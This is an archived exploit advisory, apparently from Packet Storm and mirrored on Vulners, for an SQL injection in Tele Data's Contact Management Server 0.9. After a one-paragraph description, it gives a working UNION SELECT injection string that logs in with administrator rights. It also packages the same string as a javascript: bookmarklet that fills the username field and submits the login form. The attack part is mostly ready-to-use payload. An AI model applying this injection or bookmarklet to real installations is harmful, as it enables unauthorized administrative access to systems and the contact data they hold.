Lucene search
+L

Tele Data's CMS 0.9 SQL Injection

🗓️ 28 Apr 2010 00:00:00Reported by AutoSec ToolsType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 24 Views

Tele Data's CMS 0.9 SQL Injection, Admin login bypass, JavaScript exploi

Code
`|=================================================================================================|  
| ___ ___ ___ ___ ___ ___ |  
| /\ \ /\ \ /\__\ ___ /\ \ /\ \ /\ \ |  
| /::\ \ /::\ \ /::| | /\ \ /::\ \ /::\ \ /::\ \ |  
| /:/\:\ \ /:/\:\ \ /:|:| | \:\ \ /:/\:\ \ /:/\:\ \ /:/\:\ \ |  
| /:/ \:\ \ /:/ \:\ \ /:/|:| |__ /::\__\ /::\~\:\ \ /::\~\:\ \ /::\~\:\ \ |  
| /:/__/ \:\__\ /:/__/ \:\__\ /:/ |:| /\__\ __/:/\/__/ /:/\:\ \:\__\ /:/\:\ \:\__\ /:/\:\ \:\__\ |  
| \:\ \ \/__/ \:\ \ /:/ / \/__|:|/:/ / /\/:/ / \/__\:\ \/__/ \:\~\:\ \/__/ \/_|::\/:/ / |  
| \:\ \ \:\ /:/ / |:/:/ / \::/__/ \:\__\ \:\ \:\__\ |:|::/ / |  
| \:\ \ \:\/:/ / |::/ / \:\__\ \/__/ \:\ \/__/ |:|\/__/ |  
| \:\__\ \::/ / /:/ / \/__/ \:\__\ |:| | |  
| \/__/ \/__/ \/__/ \/__/ \|__| |  
| |  
|=================================================================================================|  
| |  
| Vulnerability............SQL Injection |  
| Software.................Tele Data's Contact Management Server 0.9 |  
| Download.................http://teledata.qc.ca/td_cms/TD_CMS_SETUPEX.exe |  
| Date.....................4/28/10 |  
| |  
|=================================================================================================|  
| |  
| Site.....................http://cross-site-scripting.blogspot.com/ |  
| [email protected] |  
| |  
|=================================================================================================|  
|  
| ##Description##  
|  
| There isn't much in the way of security here. It's possible to log in with admin priviledges by  
| injecting SQL into the username field. As there are client side length contstraints in place for  
| the username field I packaged the exploit in some javascript for ease of use.  
|  
|  
| ##Exploit##   
|  
| ' or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;--  
|  
|  
| ##Proof of Concept##   
|  
| javascript:document.forms[0][0].setAttribute("value","' or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;--");document.forms[0].submit();  
|  
|=================================================================================================|  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation